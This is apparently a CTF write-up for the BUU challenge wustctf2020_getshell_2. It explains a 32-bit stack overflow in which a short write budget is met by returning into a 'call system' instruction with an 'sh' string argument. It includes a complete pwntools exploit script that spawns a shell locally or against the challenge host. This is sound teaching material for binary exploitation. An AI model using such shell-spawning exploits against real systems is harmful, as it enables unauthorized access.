PWN

BUU|PWN|wustctf2020_getshell_2

Posted by Elli0t on 2020-06-03

This challenge is a very simple stack overflow, but I still learned something new from it:

  • The system function only needs "sh" as its argument to get a shell.
  • When the overflow is limited in length (only 8 bytes past the saved return address here, so once you write a function address plus a fake return address there is no room left for the argument), the fix is to find a `call system` instruction and return into it directly. The CALL pushes the return address itself, which saves 4 bytes that can instead hold the address of "sh".
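The two stack layouts contrasted above, as an added Python example that is not part of the original write-up: it packs the chains with `struct` rather than pwntools so it runs anywhere, and since the write-up only gives the address of the `call system` site (its variable named `system`), the address of system() itself is a labelled placeholder.

```python
import struct

# Layout from the write-up: 28 bytes of padding reach the saved return address,
# and only 8 more bytes can be written past it.
PAD_LEN = 28
BUDGET = 8

# Addresses from the write-up (32-bit binary, no PIE). The write-up calls the
# second one `system`; per its explanation it is the `call system` instruction.
SH_STR = 0x08048670
CALL_SYSTEM = 0x8048529
SYSTEM_FUNC = 0x41414141  # placeholder: the write-up does not give system()'s own address

def p32(value):
    """Pack a 32-bit little-endian integer (same as pwntools' p32 on x86)."""
    return struct.pack("<I", value)

def ret2func_chain(func, arg):
    """Classic layout: overwrite EIP with func, then a fake return address,
    then the argument, since system() reads its argument at [esp+4] after RET."""
    return p32(func) + p32(0xDEADBEEF) + p32(arg)

def call_gadget_chain(call_site, arg):
    """Return into a `call system` instruction instead: CALL pushes the return
    address itself, so the chain is only [call_site][arg]."""
    return p32(call_site) + p32(arg)

def build_payload(chain, pad_len=PAD_LEN, budget=BUDGET):
    """Prepend the padding, refusing any chain that exceeds the write budget."""
    if len(chain) > budget:
        raise ValueError("chain needs %d bytes, only %d available" % (len(chain), budget))
    return b"a" * pad_len + chain

def classic_fits():
    """Does the classic 12-byte layout fit in the 8-byte budget? (It does not.)"""
    try:
        build_payload(ret2func_chain(SYSTEM_FUNC, SH_STR))
        return True
    except ValueError:
        return False
```

`build_payload(call_gadget_chain(CALL_SYSTEM, SH_STR))` reproduces exactly the payload the write-up's script sends.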

```python
#coding:utf-8
from pwn import *
import sys
import time

context.terminal = ["tmux", "sp", "-h"]
context.log_level = 'debug'

DEBUG = 0
LOCAL = True
BIN = './wustctf2020_getshell_2'
HOST = 'node3.buuoj.cn'
PORT = 25450

def exploit(sh):
    s_h = 0x08048670      # address of the "sh" string in the binary
    system = 0x8048529    # address of the `call system` instruction, so no fake return address is needed
    # 28 bytes of padding up to the saved return address, then the 8-byte chain
    payload = b'a' * 28 + p32(system) + p32(s_h)
    time.sleep(1)
    sh.sendline(payload)
    sh.interactive()
    return

if __name__ == '__main__':
    elf = ELF(BIN)
    if len(sys.argv) > 1:
        LOCAL = False
        sh = remote(HOST, PORT)
        exploit(sh)
    else:
        LOCAL = True
        sh = process(BIN)
        log.info('PID: ' + str(proc.pidof(sh)[0]))
        # pause
        if DEBUG:
            gdb.attach(sh)
        exploit(sh)
```

References

https://blog.csdn.net/weixin_45461609/article/details/105166662